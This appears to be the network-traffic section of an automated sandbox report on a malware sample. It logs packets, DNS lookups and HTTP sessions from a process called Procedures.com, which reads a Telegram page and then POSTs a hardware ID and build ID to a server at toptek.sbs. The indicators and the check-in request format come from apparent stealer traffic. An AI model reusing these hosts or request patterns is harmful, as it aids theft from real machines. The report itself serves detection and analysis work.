                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.309225082 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.309431076 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.338138103 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.340622902 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.647547960 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.654855013 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.659831047 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.659889936 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.659975052 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.660229921 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.673100948 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.988023996 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.991660118 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.991681099 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.991781950 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:00.994066954 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.013178110 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.327735901 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.332838058 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.332864046 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.333046913 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.333290100 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.341099024 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.655421019 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.659848928 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.659893036 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.659945011 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.660175085 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.673038006 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.988423109 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.999635935 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.999660969 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.999711990 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:01.999974966 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.007266045 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.325732946 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.331739902 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.331784964 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.331888914 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.332175970 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.339417934 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.653919935 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.659003019 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.659018040 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.659102917 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.659344912 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.666655064 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.981043100 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.985002995 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.985014915 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:02.985028028 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:08.850620985 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:08.850713968 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:08.850734949 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:08.850898027 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:08.857089996 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.171858072 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.178534031 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.178550005 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.178622007 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.178940058 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.186542034 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.500956059 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.506974936 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.506989956 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.507004976 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.507311106 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.516479969 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.830889940 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.837986946 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.838015079 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.838098049 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.838455915 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:09.850739002 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.171320915 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.171397924 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.171435118 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.171524048 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.171710968 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.178190947 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.493000984 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.499736071 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.499825001 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.499874115 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.500036955 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.507024050 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.821285963 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.827279091 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.827289104 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.827305079 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.827591896 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:10.834862947 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.149389982 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.157078981 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.157157898 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.157196999 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.157561064 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.164664984 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.479557037 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.487953901 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.487967968 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.487977028 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.488405943 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.500178099 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.816823959 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.822088003 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.822252035 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.822282076 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.822598934 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:11.844942093 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.159570932 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.165169001 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.165182114 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.165237904 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.165786028 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.178194046 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.492592096 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.498105049 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.498213053 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.498224974 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.498478889 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.508227110 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.825537920 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.830722094 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.830852032 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.830905914 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.831336021 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.839538097 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.154998064 CET4435344423.209.72.32192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 06:23:13.133224010 CET | 192.168.2.5 | 1.1.1.1 | 0xeed1 | Standard query (0) | ZWVyoKcTcBhhzV.ZWVyoKcTcBhhzV | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:23:38.226248026 CET | 192.168.2.5 | 1.1.1.1 | 0xceab | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:23:40.335803986 CET | 192.168.2.5 | 1.1.1.1 | 0xb93d | Standard query (0) | toptek.sbs | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:23:55.778043985 CET | 192.168.2.5 | 1.1.1.1 | 0x4c64 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:23:55.778204918 CET | 192.168.2.5 | 1.1.1.1 | 0x228e | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:23.016138077 CET | 192.168.2.5 | 1.1.1.1 | 0xf7ae | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:23.016525030 CET | 192.168.2.5 | 1.1.1.1 | 0xc71a | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:25.719722986 CET | 192.168.2.5 | 1.1.1.1 | 0xaeb6 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:25.720711946 CET | 192.168.2.5 | 1.1.1.1 | 0x2513 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:27.189282894 CET | 192.168.2.5 | 1.1.1.1 | 0x4ba9 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:27.189515114 CET | 192.168.2.5 | 1.1.1.1 | 0xb2d | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:27.190294981 CET | 192.168.2.5 | 1.1.1.1 | 0xa6ac | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:27.190691948 CET | 192.168.2.5 | 1.1.1.1 | 0x21ed | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:27.190999985 CET | 192.168.2.5 | 1.1.1.1 | 0xc305 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:27.191361904 CET | 192.168.2.5 | 1.1.1.1 | 0x73bd | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:27.219543934 CET | 192.168.2.5 | 1.1.1.1 | 0xb47f | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:27.219927073 CET | 192.168.2.5 | 1.1.1.1 | 0x172f | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:28.099169970 CET | 192.168.2.5 | 1.1.1.1 | 0x7181 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:28.099387884 CET | 192.168.2.5 | 1.1.1.1 | 0xda25 | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:28.102222919 CET | 192.168.2.5 | 1.1.1.1 | 0xf414 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:28.102442980 CET | 192.168.2.5 | 1.1.1.1 | 0x8c90 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:28.238471031 CET | 192.168.2.5 | 1.1.1.1 | 0xba98 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:28.238612890 CET | 192.168.2.5 | 1.1.1.1 | 0x6633 | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:28.383244038 CET | 192.168.2.5 | 1.1.1.1 | 0xa2ad | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:24:28.383373022 CET | 192.168.2.5 | 1.1.1.1 | 0xbfe0 | Standard query (0) | api.msn.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 06:23:13.356106043 CET | 1.1.1.1 | 192.168.2.5 | 0xeed1 | Name error (3) | ZWVyoKcTcBhhzV.ZWVyoKcTcBhhzV | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:23:38.365381002 CET | 1.1.1.1 | 192.168.2.5 | 0xceab | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:23:40.481794119 CET | 1.1.1.1 | 192.168.2.5 | 0xb93d | No error (0) | toptek.sbs | | 94.130.188.57 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:23:55.918572903 CET | 1.1.1.1 | 192.168.2.5 | 0x4c64 | No error (0) | www.google.com | | 142.250.181.132 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:23:55.918586016 CET | 1.1.1.1 | 192.168.2.5 | 0x228e | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Dec 23, 2024 06:24:23.153620005 CET | 1.1.1.1 | 192.168.2.5 | 0xf7ae | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:24:23.154135942 CET | 1.1.1.1 | 192.168.2.5 | 0xc71a | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:24:23.438946009 CET | 1.1.1.1 | 192.168.2.5 | 0xc53d | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:24:23.445375919 CET | 1.1.1.1 | 192.168.2.5 | 0x76b4 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 06:24:23.445375919 CET | 1.1.1.1 | 192.168.2.5 | 0x76b4 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:25.858575106 CET1.1.1.1192.168.2.50x2513No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:25.955471992 CET1.1.1.1192.168.2.50xaeb6No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.326818943 CET1.1.1.1192.168.2.50xb2dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.326834917 CET1.1.1.1192.168.2.50x4ba9No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.326834917 CET1.1.1.1192.168.2.50x4ba9No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327197075 CET1.1.1.1192.168.2.50xa6acNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327197075 CET1.1.1.1192.168.2.50xa6acNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327771902 CET1.1.1.1192.168.2.50xc305No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327771902 CET1.1.1.1192.168.2.50xc305No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328094006 CET1.1.1.1192.168.2.50x21edNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328370094 CET1.1.1.1192.168.2.50x73bdNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.356688976 CET1.1.1.1192.168.2.50xb47fNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.356688976 CET1.1.1.1192.168.2.50xb47fNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.356805086 CET1.1.1.1192.168.2.50x172fNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.239233017 CET1.1.1.1192.168.2.50x8c90No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.239362955 CET1.1.1.1192.168.2.50xf414No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET1.1.1.1192.168.2.50x7181No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET1.1.1.1192.168.2.50x7181No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET1.1.1.1192.168.2.50x7181No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET1.1.1.1192.168.2.50x7181No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.375528097 CET1.1.1.1192.168.2.50x6633No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.377123117 CET1.1.1.1192.168.2.50xba98No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.520545959 CET1.1.1.1192.168.2.50xa2adNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.520572901 CET1.1.1.1192.168.2.50xbfe0No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49739 | 149.154.167.99 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:39 UTC | 85 | OUT | GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:23:40 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 05:23:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12295
Connection: close
Set-Cookie: stel_ssid=c042b3ea66b019bf4b_4085821867753902132; expires=Tue, 24 Dec 2024 05:23:40 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-23 05:23:40 UTC | 12295 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49745 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:42 UTC | 230 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:23:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:23:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:23:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49754 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:23:44 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 255
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:23:44 UTC | 255 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="hwid"064A6C84405B340779059-a33c7340-61ca------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7QQIMOZMYUSRQI58G4WT--
